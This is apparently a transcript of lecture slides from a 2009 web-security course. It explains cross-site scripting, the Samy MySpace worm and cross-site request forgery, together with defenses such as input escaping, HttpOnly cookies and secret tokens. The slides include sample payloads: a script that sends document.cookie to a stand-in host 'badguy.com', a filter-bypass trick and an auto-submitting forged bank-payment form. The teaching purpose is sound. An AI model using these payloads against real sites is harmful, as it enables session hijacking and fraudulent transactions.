web security nick feamster cs 6262 spring 2009. 2 cross-site scripting overview 2 attack server...
TRANSCRIPT
Web Security
Nick FeamsterCS 6262
Spring 2009
2
Cross-Site Scripting Overview
2
Attack Server
Server Victim
User Victim
visit web site
receive malicious page
click on linkecho user input
1
2
3
send valuable data
5
4
33
The Setup
• User input is echoed into HTML response.
• Example: search field
– http://victim.com/search.php ? term = apple
– search.php responds with:<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET[term] ?> :
. . .
</BODY> </HTML>
• Is this exploitable?
44
Bad Input
• Consider link: (properly URL encoded)
http://victim.com/search.php ? term =
<script> window.open(
“http://badguy.com?cookie = ” +
document.cookie ) </script>
What if user clicks on this link?1. Browser goes to victim.com/search.php
2. Victim.com returns
<HTML> Results for <script> … </script>
3. Browser executes script:
Sends badguy.com cookie for victim.com
55
So What?
• Why would user click on such a link?– Phishing email in webmail client (e.g. gmail).
– Link in doubleclick banner ad
… many many ways to fool user into clicking
• What if badguy.com gets cookie for victim.com ?– Cookie can include session auth for victim.com
• Or other data intended only for victim.com
Violates same origin policy
66
Much Worse
• Attacker can execute arbitrary scripts in browser
• Can manipulate any DOM component on victim.com– Control links on page– Control form fields (e.g. password field) on this page
and linked pages.• Example: MySpace.com phishing attack injects
password field that sends password to bad guy.
7
Types of XSS vulnerabilities
• DOM-Based (local)– Problem exists within a page’s client-side script
• Non-persistent (“reflected”)– Data provided by a Web client is used by server-side scripts to
generate a page for that user
• Persistent (“stored”)– Data provided to an application is first stored and later displayed
to users in a Web page– Potentially more serious if the page is rendered more than once
8
Example Persistent Attack
• Mallory posts a message to a message board
• When Bob reads the message, Mallory’s XSS steals Bob’s auth cookie
• Mallory can now impersonate Bob with Bob’s auth cookie
9
Example Non-Persistent Attack
• Bob’s Web site contains an XSS vulnerability• Mallory convinces Alice to click on a URL to
exploit this vulnerability• The malicious script enbedded in the URL
executes in Alice’s browser, as if coming from Bob’s site
• This script could, e.g., email Alice’s cookie to Bob
1010
MySpace.com (Samy worm)
• Users can post HTML on their pages
– MySpace.com ensures HTML contains no
<script>, <body>, onclick, <a href=javascript://>
– … but can do Javascript within CSS tags:<div style=“background:url(‘javascript:alert(1)’)”>
And can hide “javascript” as “java\nscript”
• With careful javascript hacking:
– Samy’s worm: infects anyone who visits an infected MySpace page … and adds Samy as a friend.
– Samy had millions of friends within 24 hours.
11
Defenses needed at server
11
Attack Server
Server Victim
User Victim
visit web site
receive malicious page
click on linkecho user input
1
2
3
send valuable data
5
4
1212
Avoiding XSS Bugs
• Main problem: – Input checking is difficult --- many ways to inject scripts into
HTML.
• Preprocess input from user before echoing it
• PHP: htmlspecialchars(string)• & & " " ' ' <
< > >
– htmlspecialchars( "<a href='test'>Test</a>", ENT_QUOTES);
Outputs: <a href='test'>Test</a>
1313
httpOnly Cookies
BrowserServer
GET …
HTTP Header:Set-cookie: NAME=VALUE ;
HttpOnly
• Cookie sent over HTTP(s), but not accessible to scripts
• cannot be read via document.cookie
• Helps prevent cookie theft via XSS
… but does not stop most other risks of XSS bugs.
Another approach: Restrict use of cookies to some IP address
14
Cross Site Request Forgery
15
Overview
15
Attack Server
Server Victim
User Victim
establish session
send forged request
visit serverreceive malicious
page
1
2
3
4
Q: how long do you stay logged on to Gmail?
16
Recall: session using cookies
ServerBrowserPOST/login.cgi
Set-cookie: authenticator
GET…Cookie: authenticator
response
17
Cross Site Request Forgery (XSRF)• Example:
– User logs in to bank.com. Does not sign off.– Session cookie remains in browser state
– Then user visits another site containing:
<form name=F action=http://bank.com/BillPay.php>
<input name=recipient value=badguy> …
<script> document.F.submit(); </script> – Browser sends user auth cookie with request
• Transaction will be fulfilled
• Problem: – cookie auth is insufficient when side effects can occur
18
Login CSRF
19
CSRF Defenses
• Secret token– Place nonce in page/form from honest site– Check nonce in POST
• Confirm part of ongoing session with server– Token in POST can be HMAC of session ID in cookie
• Check referer (sic) header– Referer header is provided by browser, not script– Unfortunately, often filtered for privacy reasons
• Use custom headers via XMLHttpRequest– This requires global change in server apps
19
20
CSRF Recommendations
• Login CSRF– Strict Referer validation – Login forms typically submit over HTTPS, not blocked
• HTTPS sites, such as banking sites – Use strict Referer validation to protect against CSRF
• Other– Use Ruby-on-Rails or other framework that implements secret
token method correctly
• Future– Alternative to Referer with fewer privacy problems– Send only on POST, send only necessary data
20